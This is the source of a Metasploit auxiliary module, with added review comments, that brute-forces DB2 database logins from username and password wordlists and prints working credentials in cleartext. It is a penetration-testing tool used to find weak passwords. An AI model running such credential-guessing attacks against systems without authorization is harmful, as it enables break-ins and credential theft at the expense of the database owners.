
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/db2/db2_auth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/db2'
# Auxiliary scanner module that tries username/password combinations against
# a DB2 instance and records the outcome of every attempt.
#
# Review notes for operators and defenders:
# * Each successful credential is written in cleartext to the console
#   (print_good), so console output and any session logs should be handled as
#   sensitive material.
# * Results are also handed to create_credential / create_credential_login /
#   invalidate_login. Those helpers are defined outside this file
#   (presumably in Msf::Auxiliary::Report, TODO confirm), so their storage
#   behaviour is not visible here.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DB2
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Declares the module metadata and registers the proxy option plus the
  # three optional wordlist paths (USERPASS_FILE, USER_FILE, PASS_FILE).
  def initialize
    # The continuation lines of the %q{} literal stay flush-left on purpose:
    # whitespace inside the literal is part of the string.
    super(
      'Name' => 'DB2 Authentication Brute Force Utility',
      'Description' => %q{This module attempts to authenticate against a DB2
instance using username and password combinations indicated by the
USER_FILE, PASS_FILE, and USERPASS_FILE options.},
      'Author' => ['todb'],
      'References' => [
        [ 'CVE', '1999-0502'] # Weak password
      ],
      'License' => MSF_LICENSE
    )

    # Every default wordlist lives under <data_directory>/wordlists.
    wordlist = ->(file_name) { File.join(Msf::Config.data_directory, "wordlists", file_name) }

    register_options(
      [
        Opt::Proxies,
        OptPath.new(
          'USERPASS_FILE',
          [ false, "File containing (space-separated) users and passwords, one pair per line",
            wordlist.call("db2_default_userpass.txt") ]
        ),
        OptPath.new(
          'USER_FILE',
          [ false, "File containing users, one per line", wordlist.call("db2_default_user.txt") ]
        ),
        OptPath.new(
          'PASS_FILE',
          [ false, "File containing passwords, one per line", wordlist.call("db2_default_pass.txt") ]
        ),
      ]
    )
  end

  # Runs the login scanner against one host and reports each attempt.
  #
  # @param ip [String] address of the host under test, as supplied by the
  #   scanner mixin (type assumed from its use in the output strings)
  def run_host(ip)
    # The DATABASE datastore value is passed as the credential realm.
    credentials = build_credential_collection(
      realm: datastore['DATABASE'],
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    # Transport, TLS and pacing settings are all taken from the datastore;
    # only the connection timeout is fixed here (30, unit not shown in this
    # file).
    scanner_options = configure_login_scanner(
      host: ip,
      port: rport,
      proxies: datastore['PROXIES'],
      cred_details: credentials,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 30,
      max_send_size: datastore['TCP::max_send_size'],
      send_delay: datastore['TCP::send_delay'],
      framework: framework,
      framework_module: self,
      ssl: datastore['SSL'],
      ssl_version: datastore['SSLVersion'],
      ssl_verify_mode: datastore['SSLVerifyMode'],
      ssl_cipher: datastore['SSLCipher'],
      local_port: datastore['CPORT'],
      local_host: datastore['CHOST']
    )
    login_scanner = Metasploit::Framework::LoginScanner::DB2.new(scanner_options)

    login_scanner.scan! do |result|
      # Tag the attempt with the originating module and workspace before it
      # is reported.
      record = result.to_h
      record[:module_fullname] = fullname
      record[:workspace_id] = myworkspace_id

      if result.success?
        # The credential core is created first and then attached to the
        # record that describes the login.
        record[:core] = create_credential(record)
        create_credential_login(record)

        # The working credential is printed in cleartext.
        print_good("#{ip}:#{rport} - Login Successful: #{result.credential}")
      else
        invalidate_login(record)
        # The attempted credential also appears in this message; vprint_error
        # is presumably emitted only in verbose mode (defined outside this file).
        vprint_error("#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})")
      end
    end
  end
end